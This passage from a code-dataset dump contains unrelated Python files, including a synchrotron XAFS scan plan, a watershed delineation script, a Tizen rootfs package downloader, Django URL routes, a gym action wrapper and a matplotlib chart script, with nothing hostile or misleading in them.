'folder': BMMuser.folder,\n 'element': p[\"element\"],\n 'edge': p[\"edge\"],\n 'repetitions': p[\"nscans\"],\n 'count': cnt, }\n kafka_message({'xafsscan': 'next',\n 'count': cnt })\n if any(md in p['mode'] for md in ('trans', 'ref', 'yield', 'test')):\n uid = yield from scan_nd([quadem1, ic0], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : f'scan_nd xafs {p[\"mode\"]}',\n 'BMM_kafka': { 'hint': f'xafs {p[\"mode\"]}', **more_kafka }})\n elif any(md in p['mode'] for md in ('icit', 'ici0')):\n uid = yield from scan_nd([quadem1, ic0], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : f'scan_nd xafs {p[\"mode\"]}',\n 'BMM_kafka': { 'hint': f'xafs {p[\"mode\"]}', **more_kafka }})\n elif user_ns['with_xspress3'] is True and plotting_mode(p['mode']) == 'xs':\n uid = yield from scan_nd([quadem1, ic0, xs], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : 'scan_nd xafs fluorescence',\n 'BMM_kafka': { 'hint': 'xafs xs', **more_kafka }})\n elif user_ns['with_xspress3'] is True and plotting_mode(p['mode']) == 'xs1':\n uid = yield from scan_nd([quadem1, ic0, xs1], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : 'scan_nd xafs fluorescence',\n 'BMM_kafka': { 'hint': 'xafs xs1', **more_kafka }})\n else:\n uid = yield from scan_nd([quadem1, ic0, vor], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : 'scan_nd xafs fluorescence',\n 'BMM_kafka': { 'hint': 'xafs analog', **more_kafka }})\n\n ## here is where we would use the new SingleRunCache solution in databroker v1.0.3\n ## see #64 at https://github.com/bluesky/tutorials\n\n kafka_message({'xafs_sequence' :'add',\n 'uid' : uid})\n #kafka_message({'xafs_visualization' : uid,\n # 'element' : p[\"element\"],\n # 'edge' : p[\"edge\"],\n # 'folder' : BMMuser.folder,\n # 'mode' : p['mode']})\n \n if 'xs' in plotting_mode(p['mode']):\n 
hdf5_uid = xs.hdf5.file_name.value\n \n uidlist.append(uid)\n header = db[uid]\n write_XDI(datafile, header)\n print(bold_msg('wrote %s' % datafile))\n BMM_log_info(f'energy scan finished, uid = {uid}, scan_id = {header.start[\"scan_id\"]}\\ndata file written to {datafile}')\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## data evaluation + message to Slack\n ## also sync data with Google Drive\n if any(md in p['mode'] for md in ('trans', 'fluo', 'flou', 'both', 'ref', 'xs', 'xs1', 'yield')):\n try:\n score, emoji = user_ns['clf'].evaluate(uid, mode=plotting_mode(p['mode']))\n report(f\"ML data evaluation model: {emoji}\", level='bold', slack=True)\n if score == 0:\n report(f'An {emoji} may not mean that there is anything wrong with your data. See https://tinyurl.com/yrnrhshj', level='whisper', slack=True)\n with open('/home/xf06bm/Data/bucket/failed_data_evaluation.txt', 'a') as f:\n f.write(f'{now()}\\n\\tmode = {p[\"mode\"]}/{plotting_mode(p[\"mode\"])}\\n\\t{uid}\\n\\n')\n except:\n pass\n if p['lims'] is True:\n try:\n if not is_re_worker_active():\n rsync_to_gdrive()\n synch_gdrive_folder()\n except Exception as e:\n print(error_msg(e))\n report(f'Failed to push {fname} to Google drive...', level='bold', slack=True)\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## generate left sidebar text for the static html page for this scan sequence\n js_text = f'#{header.start[\"scan_id\"]}
{uid}
'\n ##% (fname, fname, header.start['scan_id'], fname, uid)\n printedname = fname\n if len(p['filename']) > 11:\n printedname = fname[0:6] + '···' + fname[-5:]\n dossier.scanlist += f'
  • {printedname}    {js_text}
  • \\n' \n # % (quote(fname), fname, printedname, js_text)\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## finish up, close out\n dossier.uidlist = uidlist\n dossier.seqend = now('%A, %B %d, %Y %I:%M %p')\n print('Returning to fixed exit mode') # and returning DCM to %1.f' % eave)\n dcm.mode = 'fixed'\n #yield from mv(dcm_bragg.acceleration, BMMuser.acc_slow)\n #dcm_bragg.clear_encoder_loss()\n #yield from mv(dcm.energy, eave)\n #yield from mv(dcm_bragg.acceleration, BMMuser.acc_fast)\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## execute this scan sequence plan\n yield from scan_sequence(clargs) #, noreturn)\n\n def cleanup_plan(inifile):\n print('Finishing up after an XAFS scan sequence')\n BMM_clear_suspenders()\n\n #db = user_ns['db']\n ## db[-1].stop['num_events']['primary'] should equal db[-1].start['num_points'] for a complete scan\n how = 'finished :tada:'\n try:\n if 'primary' not in db[-1].stop['num_events']:\n how = '*stopped* :warning:'\n elif db[-1].stop['num_events']['primary'] != db[-1].start['num_points']:\n how = '*stopped* :warning:'\n except:\n how = '*stopped* :warning:'\n if BMMuser.final_log_entry is True:\n report(f'== XAFS scan sequence {how}', level='bold', slack=True)\n BMM_log_info(f'most recent uid = {db[-1].start[\"uid\"]}, scan_id = {db[-1].start[\"scan_id\"]}')\n ## FYI: db.v2[-1].metadata['start']['scan_id']\n #if dossier.htmlpage:\n try:\n htmlout = dossier.write_dossier()\n except Exception as E:\n report('Failed to write dossier', level='error', slack=True)\n print(error_msg('Here is the exception message:'))\n print(E)\n htmlout, prjout, pngout = None, None, None\n if htmlout is not None:\n report(f'wrote dossier {os.path.basename(htmlout)}', level='bold', slack=True)\n kafka_message({'xafsscan': 'stop',})\n kafka_message({'xafs_sequence':'stop', 'filename':os.path.join(BMMuser.folder, 'snapshots', f'{dossier.basename}.png')})\n if not is_re_worker_active():\n rsync_to_gdrive()\n 
synch_gdrive_folder()\n \n dcm.mode = 'fixed'\n yield from resting_state_plan()\n yield from sleep(2.0)\n yield from mv(dcm_pitch.kill_cmd, 1)\n yield from mv(dcm_roll.kill_cmd, 1)\n\n RE, BMMuser, dcm, dwell_time = user_ns['RE'], user_ns['BMMuser'], user_ns['dcm'], user_ns['dwell_time']\n dcm_bragg, dcm_pitch, dcm_roll, dcm_x = user_ns['dcm_bragg'], user_ns['dcm_pitch'], user_ns['dcm_roll'], user_ns['dcm_x']\n xafs_wheel, ga, linkam, gmb, lakeshore = user_ns['xafs_wheel'], user_ns['ga'], user_ns['linkam'], user_ns['gmb'], user_ns['lakeshore']\n rkvs = user_ns['rkvs']\n\n try:\n dualio = user_ns['dualio']\n except:\n pass\n \n ######################################################################\n # this is a tool for verifying a macro. this replaces an xafs scan #\n # with a sleep, allowing the user to easily map out motor motions in #\n # a macro #\n if BMMuser.macro_dryrun:\n inifile, estimate = howlong(inifile, interactive=False, **kwargs)\n (p, f) = scan_metadata(inifile=inifile, **kwargs)\n if 'filename' in p:\n print(info_msg('\\nBMMuser.macro_dryrun is True. Sleeping for %.1f seconds at sample \"%s\".\\n' %\n (BMMuser.macro_sleep, p['filename'])))\n else:\n print(info_msg('\\nBMMuser.macro_dryrun is True. 
Sleeping for %.1f seconds.\\nAlso there seems to be a problem with \"%s\".\\n' %\n (BMMuser.macro_sleep, inifile)))\n countdown(BMMuser.macro_sleep)\n return(yield from null())\n ######################################################################\n dossier = BMMDossier()\n dossier.measurement = 'XAFS'\n BMMuser.final_log_entry = True\n RE.msg_hook = None\n if BMMuser.lims is False:\n BMMuser.snapshots = False\n BMMuser.htmlout = False\n else:\n BMMuser.snapshots = True\n BMMuser.htmlout = True\n \n if is_re_worker_active():\n inifile = DEFAULT_INI\n if inifile is None:\n inifile = present_options('ini')\n if inifile is None:\n return(yield from null())\n if inifile[-4:] != '.ini':\n inifile = inifile+'.ini'\n yield from finalize_wrapper(main_plan(inifile, **kwargs), cleanup_plan(inifile))\n RE.msg_hook = BMM_msg_hook\n\n\ndef xanes(filename=None, step=2):\n '''Measure one repetition of a quick-n-dirty XANES scan from -30 to\n +40 using the element and edge currently reported by redis.\n\n attributes\n ==========\n filename: str\n Filename stub, default is {el}-{ed}-testXANES\n\n step: float\n step size in eV, default is 2 eV\n\n '''\n rkvs = user_ns['rkvs']\n params = {'bounds' : '-30 -10 20 40', 'steps' : f'5 {step} {step*2}', 'times': '0.5 0.5 0.5'}\n el = rkvs.get(\"BMM:pds:element\").decode(\"utf-8\")\n ed = rkvs.get(\"BMM:pds:edge\").decode(\"utf-8\")\n if filename is None:\n filename = f'{el}-{ed}-testXANES'\n comment = 'quick-n-dirty XANES scan'\n yield from xafs(DEFAULT_INI, filename=filename, element=el, sample=comment, prep=comment, comment=comment,\n mode='both', edge=ed, experimenters='', snapshots=False, **params)\n \n\ndef howlong(inifile=None, interactive=True, **kwargs):\n '''\n Estimate how long the scan sequence in an XAFS control file will take.\n Parameters from control file are composable via kwargs.\n\n Examples\n --------\n Interactive (command line) use:\n \n >>> howlong('scan.ini')\n\n Non-interactive use (for instance, to display the 
control file contents and a time estimate):\n \n >>> howlong('scan.ini', interactive=False)\n\n '''\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## user input, find and parse the INI file\n ## try inifile as given then DATA + inifile\n ## this allows something like RE(xafs('myscan.ini')) -- short 'n' sweet\n if is_re_worker_active():\n inifile = '/nsls2/data/bmm/shared/config/xafs/scan.ini'\n BMMuser = user_ns['BMMuser']\n if inifile is None:\n inifile = present_options('ini')\n if inifile is None:\n return('', -1)\n if inifile[-4:] != '.ini':\n inifile = inifile+'.ini'\n orig = inifile\n if not os.path.isfile(inifile):\n inifile = os.path.join(BMMuser.DATA, inifile)\n if not os.path.isfile(inifile):\n print(warning_msg('\\n%s does not exist! Bailing out....\\n' % orig))\n return(orig, -1)\n print(bold_msg('reading ini file: %s' % inifile))\n (p, f) = scan_metadata(inifile=inifile, **kwargs)\n if not p:\n print(error_msg('%s could not be read as an XAFS control file\\n' % inifile))\n return(orig, -1)\n (ok, missing) = ini_sanity(f)\n if not ok:\n print(error_msg('\\nThe following keywords are missing from your INI file: '), '%s\\n' % str.join(', ', missing))\n return(orig, -1)\n (energy_grid, time_grid, approx_time, delta) = conventional_grid(p['bounds'], p['steps'], p['times'], e0=p['e0'], element=p['element'], edge=p['edge'], ththth=p['ththth'])\n if delta == 0:\n text = f'One scan of {len(energy_grid)} points will take about {approx_time:.1f} minutes\\n'\n text +=f'The sequence of {inflect(\"scan\", p[\"nscans\"])} will take about {approx_time * int(p[\"nscans\"])/60:.1f} hours'\n else:\n text = f'One scan of {len(energy_grid)} points will take {approx_time:.1f} minutes +/- {delta:.1f} minutes \\n'\n text +=f'The sequence of {inflect(\"scan\", p[\"nscans\"])} will take about {approx_time * int(p[\"nscans\"])/60:.1f} hours +/- {delta*numpy.sqrt(int(p[\"nscans\"])):.1f} minutes'\n\n\n if interactive:\n length = 0\n bt = '\\n'\n for k in ('bounds', 
'bounds_given', 'steps', 'times'):\n addition = ' %-13s : %-50s\\n' % (k,p[k])\n bt = bt + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n for (k,v) in p.items():\n if k in ('bounds', 'bounds_given', 'steps', 'times'):\n continue\n if k in ('npoints', 'dwell', 'delay', 'inttime', 'channelcut', 'bothways'):\n continue\n addition = ' %-13s : %-50s\\n' % (k,v)\n bt = bt + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n if length < 75: length = 75\n for k in ('post_webcam', 'post_anacam', 'post_usbcam1', 'post_usbcam2', 'post_xrf'):\n addition = ' %-13s : %-50s\\n' % (k,getattr(user_ns['BMMuser'], k))\n bt = bt + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n if length < 75: length = 75\n \n boxedtext('Control file contents', bt, 'cyan', width=length+4) # see 05-functions\n print(text)\n else:\n return(inifile, text)\n\n\ndef xafs_grid(inifile=None, **kwargs):\n '''\n Return the energy and time grids specified in an INI file.\n\n '''\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## user input, find and parse the INI file\n ## try inifile as given then DATA + inifile\n ## this allows something like RE(xafs('myscan.ini')) -- short 'n' sweet\n BMMuser = user_ns['BMMuser']\n if inifile is None:\n inifile = present_options('ini')\n if inifile is None:\n return('', -1)\n if inifile[-4:] != '.ini':\n inifile = inifile+'.ini'\n orig = inifile\n if not os.path.isfile(inifile):\n inifile = os.path.join(BMMuser.DATA, inifile)\n if not os.path.isfile(inifile):\n print(warning_msg('\\n%s does not exist! 
Bailing out....\\n' % orig))\n return(orig, -1)\n print(bold_msg('reading ini file: %s' % inifile))\n (p, f) = scan_metadata(inifile=inifile, **kwargs)\n if not p:\n print(error_msg('%s could not be read as an XAFS control file\\n' % inifile))\n return(orig, -1)\n (ok, missing) = ini_sanity(f)\n if not ok:\n print(error_msg('\\nThe following keywords are missing from your INI file: '), '%s\\n' % str.join(', ', missing))\n return(orig, -1)\n (energy_grid, time_grid, approx_time, delta) = conventional_grid(p['bounds'], p['steps'], p['times'], e0=p['e0'], element=p['element'], edge=p['edge'], ththth=p['ththth'])\n print(f'{p[\"element\"]} {p[\"edge\"]}')\n return(energy_grid, time_grid)\n\n\n\n# def xanes():\n# BMMuser = user_ns['BMMuser']\n# defaul_ini = '/nsls2/data/bmm/shared/config/xafs/scan.ini'\n# el = BMMuser.element\n# yield from xafs(defaul_ini, filename=el+'_test', )\n","repo_name":"NSLS-II-BMM/profile_collection","sub_path":"startup/BMM/xafs.py","file_name":"xafs.py","file_ext":"py","file_size_in_byte":60565,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"3094089812","text":"import os\nimport yaml\n\n# load config\nwith open(os.path.expanduser('~/.jupyter/services.yaml'), 'r') as cfgfile:\n cfg = yaml.load(cfgfile, Loader=yaml.FullLoader)\n\ndef get_key(key, app='via', cfg=cfg):\n for a in cfg:\n for k, v in a.items():\n if k == app:\n return v.get(key)\n\ndef get_icon_path():\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'icons', 'via.svg')\n \ndef setup_via():\n def _get_cmd(port):\n cmd = [\n os.path.join(os.path.dirname(os.path.abspath(__file__)), 'via'), \n '--base={base_url}via', \n '--listen=127.0.0.1', \n '--port={port}'\n ]\n return cmd\n return {\n 'command': _get_cmd,\n 'timeout': 180,\n 'new_browser_tab': get_key('new_browser'),\n 'launcher_entry': {\n 'title': 'VGG Image Annotator',\n 'icon_path': get_icon_path()\n }\n 
}","repo_name":"victor-moreno/jupyterhub-deploy-docker-VM","sub_path":"singleuser/srv/jupyter_via_proxy/jupyter_via_proxy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"33"} +{"seq_id":"32269399407","text":"from pysheds.grid import Grid\n# import numpy as np\nimport fiona\nimport os\nos.environ['USE_PYGEOS'] = '0'\nimport pandas as pd\nfrom shapely.geometry import Polygon\nfrom shapely.ops import unary_union\nfrom area import area\n\n#-------------------------------------------------------------------------------\n# Constants\n#-------------------------------------------------------------------------------\n# dem = \"data/n40w090_dem.tif\"\nFLDIR = os.path.join(os.path.dirname(__file__), \"data\", \"Rasters\", \"hyd_na_dir_15s.tif\")\nFLACC = os.path.join(os.path.dirname(__file__), \"data\", \"Rasters\", \"hyd_na_acc_15s.tif\")\n\n#-------------------------------------------------------------------------------\n# Calculate Watershed Area\n#-------------------------------------------------------------------------------\ndef calculate_area(shape=None):\n # print(\"my shape\")\n # print(shape)\n # format of shape => {'type': 'Polygon', 'coordinates': [[[x, y], [x, y] ...]]}\n area_km2 = area(shape) / 1e+6\n return round(area_km2, 2)\n\n#-------------------------------------------------------------------------------\n# Calculate Bounding Box\n#-------------------------------------------------------------------------------\ndef calculate_bbox(lat, lng, radius):\n lat_dist = 0.00902\n lng_dist = 0.00898\n minx = lng - (radius * lng_dist)\n miny = lat - (radius * lat_dist)\n maxx = lng + (radius * lng_dist)\n maxy = lat + (radius * lat_dist)\n \n return (minx, miny, maxx, maxy)\n\n\n#-------------------------------------------------------------------------------\n# Delineate 
Watershed\n#-------------------------------------------------------------------------------\ndef delineate(fldir_file=FLDIR, flacc_file=FLACC, output_dir=\"output\", output_fname='', basins=None, id_field=\"id\"):\n \"\"\"\n Description\n -----------\n delineate(dem, output_dir, basins) delineates watersheds\n\n Input Format Description\n ----- ------ -----------\n fldir_file str The path to the flow direction raster\n flacc_file str The path to the flow accumulation raster\n output_dir str The path to the output folder\n output_fname str The name of the output file\n basins DataFrame Pour point DataFrame or GeoDataFrame..\n id_field str Station ID field name.\n\n Output Format Description\n ------ ------ -----------\n watersheds Shapefiles The watershed shapefiles delineated\n\n Returns\n -------\n None\n\n \"\"\"\n # # Read elevation raster\n # # ----------------------------\n # print(\"Read elevation raster\")\n # grid = Grid.from_raster(dem, nodata=-9999)\n # dem = grid.read_raster(dem, nodata=grid.nodata)\n #\n # # Condition DEM\n # # ----------------------\n # # Fill pits in DEM\n # print(\"Filling pits\")\n # dem = grid.fill_pits(dem)\n #\n # # Fill depressions in DEM\n # print(\"Filling depressions\")\n # dem = grid.fill_depressions(dem)\n #\n # # Resolve flats in DEM\n # print(\"Resolving flats\")\n # dem = grid.resolve_flats(dem)\n #\n # # Crosschecking\n # print(\"Asserting filled sinks\")\n # # assert not grid.detect_pits(dem).any()\n # # assert not grid.detect_depressions(dem).any()\n # # assert not grid.detect_flats(dem).any()\n #\n # # Determine D8 flow directions from DEM\n # # ----------------------\n # # Specify directional mapping\n #\n # # print(\"Specify directional mapping\")\n # # dirmap = (64, 128, 1, 2, 4, 8, 16, 32)\n #\n # # Cardinal and intercardinal directions are represented by numeric values in\n # # the output grid. 
By default, the ESRI scheme is used:\n # # North: 64\n # # Northeast: 128\n # # East: 1\n # # Southeast: 2\n # # South: 4\n # # Southwest: 8\n # # West: 16\n # # Northwest: 32\n\n # Compute flow directions\n # -------------------------------------\n print(\"Compute flow directions\")\n # fdir = grid.flowdir(dem)\n grid = Grid.from_raster(fldir_file)\n fdir = grid.read_raster(fldir_file)\n\n \n # Delineate a catchment\n # ---------------------\n # Specify pour point\n print(\"Specify pour point\") \n lats = basins['lat'].tolist()\n lons = basins['lng'].tolist()\n st_ids = basins[id_field].tolist()\n # watersheds = []\n\n for index in range(0, len(lats)):\n x = lons[index]\n y = lats[index]\n st_id = st_ids[index]\n \n # Calculate flow accumulation\n # --------------------------\n print(\"Calculate flow accumulation\")\n # acc = grid.accumulation(fdir)\n bbox = calculate_bbox(y, x, 5)\n acc = grid.read_raster(flacc_file, window=bbox, window_crs=grid.crs)\n\n # Snap pour point to high accumulation cell\n print(\"Snapping pour point\")\n x_snap, y_snap = grid.snap_to_mask(acc > 1000, (x, y))\n\n # Delineate the catchment\n print(\"Delineate the catchment\")\n catch = grid.catchment(x=x_snap, y=y_snap, fdir=fdir, xytype='coordinate')\n # catch_view = grid.view(catch, dtype=np.uint8)\n\n watershed = grid.polygonize(data=catch, nodata=grid.nodata)\n watershed_dict = {st_id: []}\n \n # Merging Multi-Part Watersheds\n print(\"Merging Multi-Part Watersheds\")\n for shape, val in watershed:\n if val != 0:\n shp = Polygon(shape['coordinates'][0]).buffer(0.0001)\n watershed_dict[st_id].append(shp)\n \n merged = Polygon(unary_union(watershed_dict[st_id]).buffer(-0.0001))\n new_shape = {'type': 'Polygon', 'coordinates': [tuple(merged.exterior.coords)]}\n\n print(\"Writing to shapefile\")\n file = f\"{output_dir}/{output_fname}{st_id}.geojson\"\n # Specify schema\n schema = {'geometry': 'Polygon', 'properties': {'LABEL': 'float:16', id_field: 'str',\n 'lat': 'float', 'lng': 
'float',\n 'area': 'float'}}\n if not (os.path.exists(file) and os.path.isfile(file)):\n # Write shapefile\n with fiona.open(file, 'w',\n driver='GeoJSON',\n crs=grid.crs.srs,\n schema=schema) as c:\n i = 0\n calc_area = calculate_area(new_shape)\n rec = {}\n rec['geometry'] = new_shape\n rec['properties'] = {'LABEL': str(val), id_field: st_id, 'lat': y, 'lng': x, 'area': calc_area}\n rec['id'] = str(i)\n c.write(rec)\n i += 1\n \n # for shape, value in watershed:\n # print(\"value\")\n # print(value)\n # if value == 0:\n # continue\n # shape['coordinates'][0] = shp\n # calc_area = calculate_area(shape)\n # rec = {}\n # rec['geometry'] = shape\n # rec['properties'] = {'LABEL': str(value), id_field: st_id, 'lat': y, 'lng': x, 'area': calc_area}\n # rec['id'] = str(i)\n # c.write(rec)\n # i += 1\n # print(\"check it\")\n # print(st_id, shape)\n\n\n#-------------------------------------------------------------------------------\n# Run Program\n#-------------------------------------------------------------------------------\ndef main():\n input_dir = \"data\"\n output_dir = \"output\"\n if not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n\n # basins = pd.read_csv(f\"{input_dir}/basins.csv\") # path to csv of pour points\n basins = pd.read_csv(f\"{input_dir}/basins_random.csv\")\n delineate(output_dir=output_dir, basins=basins)\n\nif __name__ == \"__main__\":\n main()","repo_name":"kokubadejo/Watershed_Delineation","sub_path":"src/PySheds/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"26561913434","text":"import pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nfrom collections import Counter\r\n\r\n# read data\r\ndata = pd.read_csv('survey_result_langs.csv')\r\nlangs = data['Languages']\r\n\r\n# count the papularity of languages \r\nlangs_counter = Counter()\r\nfor record in langs:\r\n 
langs_counter.update(str(record).split(';'))\r\nlangs_counter = langs_counter.most_common(5)\r\n\r\n# make two lists languages and their popularity\r\nlangs = [i[0] for i in langs_counter]\r\npapularity = [i[1] for i in langs_counter]\r\nexplode = [0, 0, 0, 0.1, 0]\r\n\r\n\r\nplt.pie(papularity, labels=langs, autopct='%.2f%%', \\\r\n wedgeprops={'edgecolor':'black'}, shadow=True, explode=explode)\r\n\r\n# specify the plot( add details)\r\nplt.style.use('fast')\r\nplt.title('Programming Languages Popularity on stack overfow(2020)')\r\n\r\n\r\n# show the bar\r\nplt.show()\r\n","repo_name":"hikmatullah-mohammadi/python_matplot-tutorial","sub_path":"matplot_pie.py","file_name":"matplot_pie.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"27196933659","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport re\nimport shutil\nimport subprocess\nimport urllib.parse\nimport urllib.request\n\nbasePackages = [\n 'gcc',\n 'glibc',\n 'glibc-devel',\n 'libgcc',\n 'libstdc++',\n 'libstdc++-devel',\n 'linux-glibc-devel',\n 'zlib-devel',\n]\nunifiedPackages = [\n 'capi-base-common-devel',\n 'capi-base-utils',\n 'capi-base-utils-devel',\n 'capi-system-info',\n 'capi-system-info-devel',\n 'capi-system-system-settings',\n 'capi-system-system-settings-devel',\n 'coregl',\n 'coregl-devel',\n 'ecore-core',\n 'ecore-core-devel',\n 'ecore-imf',\n 'ecore-imf-devel',\n 'ecore-imf-evas-devel',\n 'ecore-input',\n 'ecore-wl2',\n 'ecore-wl2-devel',\n 'efl-devel',\n 'eina-devel',\n 'emile-devel',\n 'eo-devel',\n 'evas',\n 'evas-devel',\n 'freetype2-devel',\n 'jsoncpp',\n 'jsoncpp-devel',\n 'libdlog',\n 'libdlog-devel',\n 'libpng-devel',\n 'libtbm',\n 'libtbm-devel',\n 'libtdm-client',\n 'libtdm-client-devel',\n 'libtdm-devel',\n 'libwayland-client',\n 'libxkbcommon-devel',\n 'wayland-devel',\n]\n\n# Execute only if run as a script.\nif __name__ != \"__main__\":\n exit(1)\n\nif not 
shutil.which('rpm2cpio'):\n print('rpm2cpio is not installed. To install:\\n'\n ' sudo apt install rpm2cpio')\n exit(1)\nif not shutil.which('cpio'):\n print('cpio is not installed. To install:\\n'\n ' sudo apt install cpio')\n exit(1)\n\n# Parse arguments.\nparser = argparse.ArgumentParser(\n description='Tizen rootfs generator (for Flutter)')\nparser.add_argument(\n '-a', '--arch', type=str, choices=['arm', 'arm64', 'x86'],\n help='target architecture (defaults to \"arm\")',\n default='arm')\nparser.add_argument(\n '-o', '--output', metavar='PATH', type=str,\n help='path to the output directory (defaults to arch)')\nparser.add_argument(\n '-c', '--clean', action='store_true',\n help='clean the output directory and exit')\nparser.add_argument(\n '-b', '--base-repo', metavar='URL', type=str,\n help='url to the base packages repository',\n default='http://download.tizen.org/snapshots/tizen/5.5-base/latest/repos/standard/packages')\nparser.add_argument(\n '-u', '--unified-repo', metavar='URL', type=str,\n help='url to the unified packages repository',\n default='http://download.tizen.org/snapshots/tizen/5.5-unified/latest/repos/standard/packages')\nargs = parser.parse_args()\n\nif not args.output:\n args.output = args.arch\n\nif args.clean:\n shutil.rmtree(args.output)\n exit(0)\n\ndownloadPath = os.path.join(args.output, '.rpms')\nos.makedirs(downloadPath, exist_ok=True)\nexistingRpms = [f for f in os.listdir(downloadPath) if f.endswith('.rpm')]\n\nif args.arch == 'arm':\n archName = 'armv7l'\nelif args.arch == 'arm64':\n archName = 'aarch64'\nelif args.arch == 'x86':\n archName = 'i686'\nelse:\n print(f'Undefined arch: {args.arch}')\n exit(1)\n\n# Retrieve html documents.\ndocuments = {}\nfor url in [f'{args.base_repo}/{archName}',\n f'{args.base_repo}/noarch',\n f'{args.unified_repo}/{archName}',\n f'{args.unified_repo}/noarch']:\n request = urllib.request.Request(url)\n with urllib.request.urlopen(request) as response:\n documents[url] = 
response.read().decode('utf-8')\n\n# Download packages.\nfor package in basePackages + unifiedPackages:\n quoted = urllib.parse.quote(package)\n pattern = f'{re.escape(quoted)}-\\\\d+\\\\.[\\\\d_\\\\.]+-[\\\\d\\\\.]+\\\\..+\\\\.rpm'\n\n if any([re.match(pattern, f) for f in existingRpms]):\n print(f'Already downloaded {package}')\n continue\n\n for parent, doc in documents.items():\n match = re.findall(f'.+?', doc)\n if len(match) > 0:\n url = f'{parent}/{match[0]}'\n break\n\n if len(match) == 0:\n print(f'Could not find a package {package}')\n else:\n print(f'Downloading {url}...')\n urllib.request.urlretrieve(url, f'{downloadPath}/{match[0]}')\n\n# Extract files.\nfor rpm in [f for f in os.listdir(downloadPath) if f.endswith('.rpm')]:\n abspath = f'{os.path.abspath(downloadPath)}/{rpm}'\n command = f'cd {args.output} && rpm2cpio {abspath} | cpio -idum --quiet'\n subprocess.run(command, shell=True, check=True)\n\n# Create symbolic links. Any errors are ignored.\nsubprocess.run(f'ln -s asm-{args.arch} {args.output}/usr/include/asm',\n shell=True)\nsubprocess.run(f'ln -s libecore_input.so.1 {args.output}/usr/lib/libecore_input.so',\n shell=True)\n\nprint('Complete')\n","repo_name":"swift-kim/sysroot","sub_path":"build-rootfs.py","file_name":"build-rootfs.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35546341173","text":"from django.urls import path\nfrom bookmark import views\n\n\napp_name = 'bookmark' # 네임스페이스 \nurlpatterns = [\n # mvc ==> mvt : m - model, v - controller, t - view\n path('', views.BookmarkLV.as_view(), name='index'),\n path('/', views.BookmarkDV.as_view(), name='detail'),\n path('add/', views.BookmarkCreateView.as_view(), name=\"add\",),\n path('change/', views.BookmarkChangeLV.as_view(), name=\"change\",),\n path('/update/', views.BookmarkUpdateView.as_view(), name=\"update\",),\n path('/delete/', views.BookmarkDeleteView.as_view(), 
name=\"delete\",),\n]\n\n","repo_name":"gospelfinder/MySite","sub_path":"bookmark/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"19484633628","text":"import gym\nimport random\n\nclass RandomActionWrapper(gym.ActionWrapper):\n\t\"\"\"docstring for RandomActionWrapper\"\"\"\n\tdef __init__(self, env, epsilon=0.5):\n\t\tsuper(RandomActionWrapper, self).__init__(env)\n\t\tself.epsilon = epsilon\n\n\tdef action(self, action):\n\t\tif random.random() < self.epsilon:\n\t\t\ta = self.env.action_space.sample()\n\t\t\tprint(\"random action !! [%d --> %d]\" % (action, a))\n\t\t\treturn a \n\t\telse:\n\t\t\treturn action\n\t\t\n\nif __name__ == '__main__':\n\tenv = RandomActionWrapper(gym.make(\"CartPole-v0\"))\n\n\ts = env.reset()\n\ttotal_return = 0.0\n\n\twhile 1:\n\t\ts, r, terminal, _ = env.step(0)\n\t\ttotal_return += r\n\t\tif terminal:\n\t\t\tbreak\n\n\tprint(\"Total return: %.3f\" % total_return)\n","repo_name":"whoji/training-ground","sub_path":"rl-lapan-book/chap2_wrapper.py","file_name":"chap2_wrapper.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"19868160381","text":"#!/usr/share/ucs-test/runner python3\n## desc: \"GPO Security Descriptor sync\"\n## exposure: dangerous\n## packages:\n## - univention-config\n## - univention-directory-manager-tools\n## - univention-samba4\n## - univention-s4-connector\n#\n# Bug #33768\n\n\nimport re\nimport subprocess\nimport time\n\nimport ldb\nfrom ldap.filter import filter_format\nfrom samba.auth import system_session\nfrom samba.credentials import Credentials\nfrom samba.dcerpc import security\nfrom samba.ndr import ndr_unpack\nfrom samba.param import LoadParm\nfrom samba.samdb import SamDB\nfrom samba.sd_utils import SDUtils\n\nimport univention.testing.udm as udm_test\nimport 
